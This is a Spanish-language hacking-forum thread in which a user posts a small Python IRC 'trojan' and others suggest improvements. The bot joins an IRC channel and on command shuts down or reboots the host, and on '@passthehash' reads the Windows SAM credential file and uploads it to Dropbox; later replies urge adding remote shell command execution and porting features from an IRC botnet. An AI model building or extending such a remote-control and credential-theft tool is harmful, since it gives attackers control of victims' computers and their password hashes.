send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Troyano IRC

  • 9 Respuestas
  • 2899 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dolphin

  • *
  • Underc0der
  • Mensajes: 91
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Septiembre 12, 2016, 01:07:06 pm »
Hola hoy he hecho este pequeño script y no se que mas ponerle para que no sea tan cortito
Código: Python
  1. import sys
  2. import time
  3. import socket
  4. import os
  5. import dropbox
  6. import datetime
  7. server=" irc.ejemplo.net"#el servidor irc tullo
  8. botnick="botejemplo"#el nombre dela maquina
  9. channel="#ejeplo"#canal
  10. client = dropbox.client.DropboxClient('Tu token')#Tu token para subirlo a dropbox(si quieres)
  11. suffix = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
  12. p = "sam"+suffix+".bin"
  13. irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  14. irc.connect((server,6667))
  15. irc.setblocking(False)
  16. time.sleep(1)
  17. irc.send("USER "+botnick+" "+botnick+" "+botnick+" :Hola soy un bot!\r\n")
  18. time.sleep(1)
  19. irc.send("NICK "+botnick+"\n")
  20. time.sleep(1)
  21. irc.send("JOIN "+channel+"\n")
  22.  
  23. while 1:
  24.      time.sleep(0.1)
  25.      try:
  26.           text=irc.recv(2040)
  27.           print(text)
  28.      except Exception:
  29.           pass
  30.      if text.find("PING")!=-1:
  31.           irc.send("PONG "+text.split()[1]+"\r\n")
  32.      if text.lower().find(":@apaga")!=-1:
  33.           os.system('shutdown -P')#para apagar la pc
  34.      if text.lower().find(":@reinicia")!=-1:
  35.           os.system('shutdown -r')#para reiniciarla
  36.       if text.lower().find(":@passthehash")!=-1:
  37.            f = open ('C:\Windows\system32\config\sam')#para abrir sam
  38.            client.put_file(p, f)#para subirlo a dropbox
  39.                  
  40.      text=""
  41. input()
  42.  
que mas le  puedo poner y solucionar para que sea mejor? ;) ;)

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    48.33%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Septiembre 12, 2016, 02:02:50 pm »
Muy buen trabajo bro! Yo creo que @You are not allowed to view links. Register or Login es el indicado para mencionarte que mejorarle!

Saludos,
ANTRAX


Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #2 en: Septiembre 12, 2016, 08:33:03 pm »
En general, un bot de irc responde a necesidades de los usuarios de un canal

Por ejemplo, si pasan muchos links capaz queres que muestre el titulo de la pagina
En un canal jugabamos a un juego en el que un usuario pasaba el link a dos articulos de wikipedia y habia que buscar la forma de llegar de uno al otro clickeando en la menor cantidad de links posibles. Habia un bot que verificaba que los resultados sean correctos y contaba los links
Si es por practicar, fijate cosas que hace otro bot. Te dejo uno que hice hace tiempo You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login
Hola,tengo una duda:

Cómo podría coger lo que el usuario escribe en un chat irc, y printearlo en el chat con un bot irc hecho en python con la librería socket?? :'(
en tu codigo, al mensaje lo tenes en la variable text
hacele un print a eso para ver que tiene y ahi fijate como extraer la parte que te interesa
para mandar algo a un canal tenes que usar privmsg
Creo que es asi: "PRIVMSG #canal: mensaje"

Desconectado dolphin

  • *
  • Underc0der
  • Mensajes: 91
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Septiembre 13, 2016, 08:03:39 am »
grax  ;),ya lo solucione lo unico que tenia que hacer es hacer un .replace:
Código: Python
  1. if text.find("ola")!=-1:
  2.           mi_texto=text.replace(":dolphin_!577db627@gateway/web/freenode/ip.MI_IP_PUBLICA PRIVMSG ##hola :", "")    
  3.           irc.send("PRIVMSG "+channel+" :"+mi_texto+"\r\n")
« Última modificación: Septiembre 13, 2016, 08:29:04 am por BadB0y_4 »

Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #4 en: Septiembre 13, 2016, 10:10:14 pm »
You are not allowed to view links. Register or Login
grax  ;),ya lo solucione lo unico que tenia que hacer es hacer un .replace:
Código: Python
  1. if text.find("ola")!=-1:
  2.           mi_texto=text.replace(":dolphin_!577db627@gateway/web/freenode/ip.MI_IP_PUBLICA PRIVMSG ##hola :", "")    
  3.           irc.send("PRIVMSG "+channel+" :"+mi_texto+"\r\n")
y si cambia esta parte? dolphin_!577db627
y si cambia la ip?
no uses replace, usa split

Desconectado dolphin

  • *
  • Underc0der
  • Mensajes: 91
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Septiembre 14, 2016, 10:41:50 am »
tienes razon,va de maravilla,gracias
Código: Python
  1.  if text.find("prueba")!=-1:
  2.           mi_texto=text.split('prueba')
  3.           irc.send("PRIVMSG "+channel+" :"+mi_texto[1]+"\r\n")

Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #6 en: Septiembre 14, 2016, 11:57:27 am »
Mira como hacen aca You are not allowed to view links. Register or Login

La idea es cortar el string en ":" y " ", que es lo que usa el protocolo para separar campos. De esa forma, si queres seguir ampliando el bot va a ser mucho mas facil

Desconectado dreadpixel

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #7 en: Marzo 12, 2017, 11:51:52 pm »
Para hacerlo realmente un troyano debes agregar funciones que puedan operar el sistema operativo que se esta siendo usado.
Puedes poner que mande comandos a la consola dependiendo que OS tenga. Y hacer poder de prueba ls o dir.



Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #8 en: Marzo 13, 2017, 09:55:13 pm »
parece que nunca me di cuenta de que estabamos hablando de un troyano, yo le hablaba como si fuera un bot comun

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 544
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« Respuesta #9 en: Marzo 17, 2017, 06:23:29 pm »
Si se trata de un troyano IRC y buscas ideas entonces revista la lista de funciones de mi IRC Botnet en Delphi : You are not allowed to view links. Register or Login , tu trabajo seria traducir a Python las funciones que te gustan del proyecto.

Saludos.

 

¿Te gustó el post? COMPARTILO!